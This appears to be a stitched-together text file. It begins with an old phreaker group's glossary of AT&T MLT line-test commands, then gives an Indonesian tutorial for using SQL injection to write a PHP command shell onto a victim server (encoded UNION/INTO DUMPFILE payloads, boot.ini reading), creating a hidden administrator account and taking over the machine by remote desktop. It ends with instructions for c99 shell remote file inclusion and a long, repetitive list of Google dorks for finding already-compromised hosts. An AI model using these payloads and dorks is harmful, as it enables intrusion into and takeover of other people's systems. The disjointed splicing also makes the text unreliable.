by MLT in some cases.  You will be put in monitor mode if you request ring,
talk or psr but MLT thinks the line is busy, or if you must talk to the
subscriber to run a rev, dial, or tt.  A callback number is required.  You can
request quick, look, or full while in monitor mode.

Psr:  Release a permanent signal

Psr attempts to release a permanent signal in a step-by-step central office.
A permanent signal is a steady dial tone on a line.  A frequent cause is a
receiver that is off-hook.  Psr lets you remove the permanent signal so that
you can monitor for room noise.  If when you monitor the line you still hear
steady dial tone, you should suspect permanent signal on the line.  Psr
requires a callback path between your callback line and the subscriber's line.
You should already have the callback path established before you enter a psr
request.

Qin:  Run a quick series in toward the co

Qin starts a series of tests that make a "quick" check of the loop toward the
central office.  It includes the same tests as quick.  It can also identify a
co line circuit if one is present and will report a line circuit if the DC
resistances look like one is present.  An MDF access is required for a qin
request.  You can use qin to test special switching machines.  For example, if
the circuit has 2 loops connected at the frame, qin lets you look at the 2nd
loop (both full & loop only test toward one loop).

Rev:  Identify touch-tone polarity reversals

Rev helps you identify a touch-tone polarity reversal.  On a good line, the
battery is connected to the ring wire and the ground is on the tip wire.
These wires must be connected to specific terminals on the telephone.  If they
are reversed, the subscriber will be able to receive calls but will not be
able to dial out.  If the line is reversed, you won't be able to hear the
tones before you enter a rev request.  Rev only reserves the line temporarily.
A callback path should be established before you make a rev request.

Rin:  Ring a subscriber's special services line

Rin lets you ring a telephone on a special services line.  A callback is
required.  If one doesn't exist, ring in sets one up for you.  To answer the
callback, answer its ring and press "0" on the touch-tone pad, and listen for
ringing.  When the subscriber answers, you will be placed in talk mode.  If
the line is busy, the call in progress will be interrupted.  Use rin to
contact the subscriber or a technician at the subscriber's home.  MDF access
is required to request rin.

Ring(#):  Ring a specific party on a multi-party line

Ring(#) lets you choose the telephone that you want to ring on a multiparty
line.  A multiparty line is one on which more than one subscriber is connected
to the same pair of wires.  Normally MLT checks the line records of the
telephone number you enter using the ring request, and automatically rings the
correct party.  When the line records indicate 2, 4, or 8 party, use the
ring(#) request and specify the party number in place of the "#."  If you
request ring1, MLT rings the party connected to the ring side.  If you request
ring2, MLT rings the party connected on the tip side.

Ring:  Ring a subscriber's line

Ring lets you ring a telephone on a single party line.  A callback path is
required but if one doesn't exist, ring sets one up for you.  To answer your
callback, answer its ring and press "0" on the touch-tone pad, and listen for
ringing.  When the subscriber answers, you will be placed in talk mode.  If
the line is busy or cannot be rung, you will be placed in monitor mode to
listen for noise or speech.  Use ring to contact the subscriber or a repair
person at the subscriber's home.

Ringer:  Check ringer configuration on a line

Ringer counts the number of ringers on each part of the loop (tip-ring,
tip-ground, and ring-ground).  The results tell you the number of telephones
found by MLT.  If there is a problem, the summary explains the problem.  If
you are testing a party line, some of the ringers found may belong to the
other party.

Rin:  Ring a subscriber's special services line

Rin lets you ring a telephone on a special services line.  A callback is
required.  If one doesn't exist, ring-in sets one up for you.  To answer the
callback, answer its ring and press "0" on the touch-tone pad, and listen for
ringing.  When the subscriber answers, you will be placed in talk mode.  If
the line is busy the call in progress will be interrupted.  Listen for noise
of speech.  Use rin to contact the subscriber or a technician at the
subscriber's home.  MDS is required to request rin.

Soak:  Identify swinging resistance condition

Soak identifies unstable ground faults (swinging resistance) on a line.
Voltage is applied to the line and a series of DC resistance measurements are
made to see the effect of that voltage.  If the resistance values are all low,
the fault is probably stable.  If even one value is 20% larger than the
original measurement, the fault may be unstable (swinging).  A repair person
who is dispatched may have trouble locating a swinging fault.  Use soak when
you find a 10-1000 kohm ground on a q test (full & loop include the soak
test), or just prior to dispatch to double-check a line's condition.

Ssa:  Special services access

The ssa request is used to access non-locally switched customer telephone
lines.  Accessing these lines is a  special case of a no-test trunk access.
However, if they go through a digital loop carrier such as SLC Series 5, and
there is special equipment available in the co, then you can test them with a
no-test trunk special se rvices access.  This means you don't have to call the
trunk.  The request can only be run from the stv mask.

Stv:  Special services trouble verification request

The stv request changes you from a tv mask to an stv mask.  Stv is used when
you need to test special services circuits (non-locally switched lines) served
by digital loop carrier systems such as SLC Series 5.  Switching to the stv
mask will not affect any information you left in the tv mask -- your status
lines will remain the same; however, the middle section of the mask will be
changed. Any request done from a tv mask can also be done from an stv mask,
but not vice versa.  The stv request can only be run from a tv mask.

Take:  Take control of a long-term access

Take is used when you want to transfer a long-term access from someone else's
terminal to your terminal.  To take control of a no-test access, enter the
telephone number that you want to transfer in the tn field.  To transfer an
MDF access to your terminal, enter the NPA-NXX in the tn field and the MDF
number in the space to the right of the regular tn field of the tv mask.
Finally, enter take in the req field.  If the previous holder had a callback
established, it would not be remover.  If necessary, you must remove the
callback using xcb and request a new callback to your telephone.

Talk:  Talk over the subscriber's line

Talk lets you talk to either a subscriber or a repair person on a subscriber's
line.  Talk does not ring the line so there must be someone waiting to talk to
you on the other end of the line.  A callback path is required for the talk
request but if one does not already exist, talk will set one up for you if you
have a callback number entered.  If the line is already accessed before the
talk request, MLT enters a "t" and the last 2 digits of the callback number
under the callback heading and updates the time since access.  You can request
quick, loop, or full while in talk mode.

Talkin:  Talk over the subscriber's special services line

Talkin lets you talk to a subscriber or a repair person on a special services
line.  Talkin does not ring the line so there must be someone waiting to talk
to you on the other end of the line.  A callback path is required for the
talkin request but if one does not already exist, talkin sets one up for you
if you have a callback number entered.  If the line is already accessed before
the talkin request, MLT enters a "t" and the last 2 digits of the callback
number under the callback heading and updates the time since access.  You must
have an MDF access to request talkin.

Tone+:  Use loud tone to help identify a pair

Tone+ puts a high amplitude tone on a line.  It is used on pairs that are very
long.  The extra amplitude helps the repair-person hear the tone over long
distances.  Tone is used to help a repair person to locate the correct pair in
a cable with many pairs of wires in it.  Use tone+ when a repair person
requests a tone on a very long pair.  If you have a callback on the line, it
will be placed in monitor mode.  If the status line gets brighter & you get a
changed state message, it means 1) The repair person found the pr & wants to
talk to you or 2) The subscriber has gone off-hook.

Tone:  Use tone to help craft identify a pair

Tone puts a metallic tone on a line.  There may be many pairs in a single
cable, making it difficult for a repair person to locate a specific line.  The
tone makes this job easier.  Before MLT places a tone on a line it does a
test.  The results tell you if there is a fault on the line.  If there is a
callback on the line when you request a tone, it will be placed in monitor
mode.  If the status line gets brighter and you get a changed state message,
it means either 1) The repair person found the pr & wants to talk to you or 2)
The subscriber has gone off-hook.

Toneca:  Use tone to help identify a cable

Toneca puts a longitudinal tone on a line.  This tone helps the repair person
find the cable binder group that the pair is in.  The repair person finds the
correct cable by listening for the tone.  Because the tone can be heard on
pairs other than the one you put it on, when tone or tone+ are inappropriate.
If the repair person does not have time to find the cable on the first try,
you can repeat the request.  Before placing the tone on the line, MLT does a
pretest and tells you if there is a fault on the line.

Tonein:  Use tone to help a technician identify a special services pair

Tonein puts a metallic tone on a special services line.  It may be difficult
for a technician to locate a specific line.  The tone makes this job easier.
Before MLT places a tone on a line it does a pretest.  An MDF access is
required in order to request a tonein.  If a callback is on the line when you
request tonein, it is placed in monitor mode.  If the status line gets
brighter and you get a changed state message, it means either 1) The repair
person found the pr & wants to talk to you or, 2) The subscriber has gone
off-hook.

Tt:  Test the subscriber's touch-tone pad

Tt checks a subscriber's touch-tone pad.  It analyzes the tones produced when
the subscriber presses the button before you make a tt request.  You in the
sequence 1 through 0.  You must instruct the subscriber to press the buttons
after hearing dial tone.  Mlt will signal you over your headset with two beeps
if the pad is good or one or no beeps if it is bad.  A callback path should be
established before you make a tt request.  You must use a no-test trunk access
to request it.  You can use the ring request to contact the subscriber and set
up a callback.

Tv:  Trouble verification request

The tv request changes you from an stv mask to a tv mask.  Tv is used when you
need to do interactive testing of locally switched telephone lines, or tests
using an MDF trunk.  Switching to the tv mask will not affect any information
you left in the stv mask -- your status lines will remain the same; however,
the middle section of the mask will be changed.  Any request done from a tv
mask can also be done from an stv mask, but not vice versa.  The request can
only be run from a stv mask.

Ver##:  Get definition and example of a ver code

Ver## gives you a description of the ver code that you type in place of the
##.  For example, a ver22 request will give you a definition of verification
code number 22 and an example of a typical set of test results that might
accompany a ver code of 22.  Use this request whenever you can't remember what
a certain ver code means.  MLT stores your tv mask when you request ver code
information.

Ver:  Test the entire telephone line

Ver starts a series of tests that do an extensive analysis of the entire line.
This includes both the inside and outside portions.  Many individual tests are
run but only the ver code and summary messages are displayed.  Outside, MLT
checks for AC and DC faults.  Inside, it checks the line circuit and dial
tone.

              Thanks to AT&T and the Bell Operating Companies.

                  Control C and The Tribunal of Knowledge

               If you have any questions or comments contact:

                                 Control C
                                 Jack Death
                               Prime Suspect
                                The Prophet
                                 The Urvile

                      Or any other member of the TOK.
==============================================================================

waduh mugkin ada sebagian yang sudah tahu masalah ini (SQL RemoteDekstop), jadi maaf aja yach kalau
saya sok tahu, buat para master tutor saya jangan diketawain y, maklum saya cuma script kiddie disini.
langsung aja yach, sebenarnya konsep dalam meremote dekstop dengan SQL sama saja, hanya saja ada yang
kita rubah sedikit syntak dari SQlnya.

===========
PERTAMA
===========
untuk langkah pertama, pastinya kita mencari web target yang vuln dengan sql injection, kalo masalah
pencarian dan dork saya serahkan pada kalian dan bisa bertanya pada Dosen Google,he5x, maklum tempat
kuliah w kadang diwarnet..:p

===========
KEDUA
===========
setelah mendapatkan web yang vuln dengan SQL Injection, lalu kita cari alamat IP dari web tersebut
(memudahkan kita dalam meremote dekstop,sebab dalam meremote,kita akan dimintai alamat IPnya)

===========
KETIGA
===========
nah udah dapetkan alamat IP web yang bersangkutan, setelah itu cari kolom yang bermasalahnya(Metode
SQL Injection), misalkan kita dapet kolom 1

code:
192.168.0.1/index.php?=-1+union+select+1--

kemudian cari versinya

code:
192.168.0.1/index.php?=-1+union+select+version()--

disini saya baru melakukan pada SQL yang versi 5.x

===========
KEEMPAT
===========
ganti kolom yang bermasalah dengan

code:
192.168.0.1/index.php?=-1+union+select+load_file('c:/boot.ini')--

perintah load_file('c:/boot.ini') digunakan untuk memanggil informasi boot dalam komputer korban

===========
KELIMA
===========
setelah itu kita convert

code:


kedalam bentuk Ascii, saya sudah tahu pasti pada maleskan convertnya, kalo gitu saya kasih aja hasilnya

code:
0x3c3f7068702073797374656d28245f6765745b5c27434d44 5c275d293b203f3e

===========
KEENAM
===========
ok kalo gitu sekarang kita buat file cmd.php dengan syntak SQL

code:
192.168.0.1/index.php?=-1+union+select+0x3c3f7068702073797374656d28245f6765745b5c27434d445c27 5d293b203f3e+into+dumpfile+'c:/xampp/htdocs/cmd.php'--


0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d2 93b203f3e >> conversian dari

+into+dumpfile+ >> untuk membuat file kedalam server

c:/xampp/htdocs/cmd.php >> dari pesan error SQL(tanda '' diubah menjadi '/'), kalo dapet yang pk appserv maka C:/AppServ/www/cmd.php
===========
KETUJUH
===========
ubh URL menjadi

code:
192.168.0.1/cmd.php?cmd=dir

maka akan terlihat atau keluar data-data yang ada pada drive c:/ komputer korban

===========
KEDELAPAN
===========
nih code yang w rada kurang ngerti, coz w gak ngerti dari mana asalnya, tapi w paham codenya buat apa

ketikan pada URL

code:
192.168.0.1/cmd.php?cmd=net user kiddies 12345 /add

net user kiddies 12345 /add >> perintah diatas adalah untuk membuat username dan password baru dalam system komputer


code:
192.168.0.1/cmd.php?cmd=net localgroup administrator kiddies /add

net localgroup administrator kiddies /add >> perintah ini untuk membuat username kita adalah administrator dalam system komputer

==========
KESEMBILAN
==========
ketikan pertintah pada run >> mstsc




==========
KESEPULUH
==========
komputer sudah ditangan anda, silahkan pergunakan dengan sebaik-baiknya dan bijak....







kalau cupu tutornya maaf banget dan kalau kurang lengkap POCnya w minta maaf juga, coz w sendiri ge belajar


syarat: remote pada komputer harus aktif,ok

mungkin udah pada tahu kan yang namanya c99, yah itu sejenis PHP shell. Jadi kita bisa menggunakan akses shell lewat yang namanya browser.
Bagaimana cara mendapatkan c99? tinggal cari aja di google sourcenya. Trus bagaimana cara gunain nya? ehm caranya make RFI contoh http://target.com/path/index.php?page=[c99 shell]
nah gitu caranya.. tapi, kadang kala para attacker seusai melakukan penetrasi seperti itu, mereka menyimpan file c99 di dalam hosting korban dan dengan nama yang aneh2 lho..

Nah, bagaimana cara cari website yang ada RFI? k'lo saya biasanya mintak ama om SkiN hgahhahhaha (minta ama om SkiN aja yah!!). Nah, k'lo gak dikasih ama om SkiN gimana? (mungkin lagi pelitnya) ya kita cari aja make google hostingan yang udah disusupin sama para attacker ohohoho lagi-lagi mbah google

Nih google dorknya..
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
download c99.php
download c99.php
download c99.php
inurl:c99.php
inurl:c99.php
allinurl: c99.php
inurl:c99.php
allinurl: c99.php
inurl:"/c99.php"
allinurl: c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99shell powered by admin
inurl:"/c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
inurl:"c99.php
inurl:"c99.php
allinurl: "c99.php"
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: "c99.php"
inurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php
inurl:"c99.php"
allinurl:c99.php
inurl:"/c99.php
inurl:c99.php?
inurl:/c99.php+uname
allinurl:"c99.php"
allinurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
allinurl:c99.php
allinurl:c99.php?
allinurl:c99.php?
allinurl:c99.php?
"inurl:c99..php"
allinurl:c99.php
c99shell [file on secure ok ]?
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
powered by Captain Crunch Security Team
allinurl:c99.php
"c99.php" filetype:php
allinurl:c99.php
inurl:c99.php
allinurl:.c99.php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.php
allinurl:c99.php
inurl:c99.php
allinurl: "c99.php"
allinurl:c99.php
allinurl:c99.php
c99shell
inurl:c99.php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:"c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:/c99.php
inurl:"c99.php"
inurl:c99.php
inurl:c99.php
c99.php download
inurl:c99.php
inurl:"c99.php"
inurl:/c99.php
inurl:"c99.php?"
inurl:c99.php
inurl:c99.php
files/c99.php
c99shell filetype:php -echo
c99shell powered by admin
inurl:c99.php
inurl:c99.php
inurl:"c99.php"
inurl:c99.php uid=0(root)
allinurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
inurl:"/c99.php" intitle:"C99shell"
inurl:"/c99.php" intitle:"C99shell"
inurl:"/c99.php" intitle:"C99shell"
C99Shell v. 1.0 pre-release build #5
inurl:c99.php
inurl:c99.php
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
c99shell v. 1.0 pre-release build #16
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
allinurl: "c99.php"
allinurl: "c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove

Logout
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
c99shell v. 1.0 release security
c99shell v. 1.0 pre-release build
inurl:c99.php
c99shell [file on secure ok ]?
C99Shell v. 1.3
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php uid=0(root)
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16
c99shell[on file]ok
c99shell[file on ]ok
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
"C99Shell v. 1.0 pre"
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. pre-release build
inurl:c99.php c99 shell
inurl:c99.php c99 shell
powered by Captain Crunch Security Team
inurl:c99.php
inurl:c99.php
!C99Shell v. 1.0 pre-release build #5!
intitle:"c99shell" filetype:php root
intitle:"c99shell" Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
inurl:"c99.php"
allintext:C99Shell v. 1.0 pre-release build #12
"C99Shell v. 1.0 pre"
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:/c99.php?
allinurl:c99.php
intitle:C99Shell pre-release
inurl:"c99.php"
powered by Captain Crunch Security Team
inurl:c99.php
C99Shell v. 1.0 pre-release build #16!
allinurl:c99.php
C99Shell v. 1.0 pre-release build #16 administrator
intitle:c99shell filetype:php
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #12
c99shell v.1.0
allinurl:c99.php
"c99shell v. 1.0 pre-release build"
inurl:"c99.php" filetype:php
"c99shell v. 1.0 "
ok c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. 1.0 pre-release build #16 |
!C99Shell v. 1.0 pre-release build #5!
!C99Shell v. 1.0 pre-release build #5!
allinurl:/c99.php
powered by Captain Crunch Security Team
inurl:c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
powered by Captain Crunch Security Team
inurl:c99.php
C99Shell v. 1.0 pre-release
inurl:c99.php
inurl:c99.php ext:php
inurl:"c99.php"
allinurl:"c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"
C99Shell v. 1.0 pre-release build #16 software apache
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
inurl:"c99.php"
allintitle: C99shell filetype:php
C99Shell v. 1.0 pre-release build #16!
"c99shell v. 1.0 pre-release"
c99shell v. 1.0 pre-release build #5
allinurl:"c99.php" filetype:php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!C99Shell v. 1.0 pre-release build #16!
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
inurl:c99.php
c99shell v. 1.0
allinurl: c99.php
--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
inurl:"/c99.php"
c99shell +uname
c99shell php + uname
c99shell php + uname
--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
allinurl:c99.php
!C99Shell v. 1.0 pre-release build #5!
C99Shell v.1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
intitle:c99shell filetype:php
"Encoder Tools Proc. FTP brute"
"c99" filetype:php intext:"Safe-Mode: OFF"
c99shell v. 1.0 pre
inurl:c99.php
intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
inurl:admin/files/
intitle:"index of /" "c99.php"
intitle:"index of" intext:c99.php
intitle:index.of c99.php
intitle:"index of" + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:"Index of/"+c99.php
c99.php "intitle:Index of "
c99.php "intitle:Index of "
c99.php "intitle:Index of "
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:"Index of/"+c99.php
"index of /" c99.php
c99.php
intitle:"Index of" c99.php
"index of" c99.php
"Index of/"+c99.php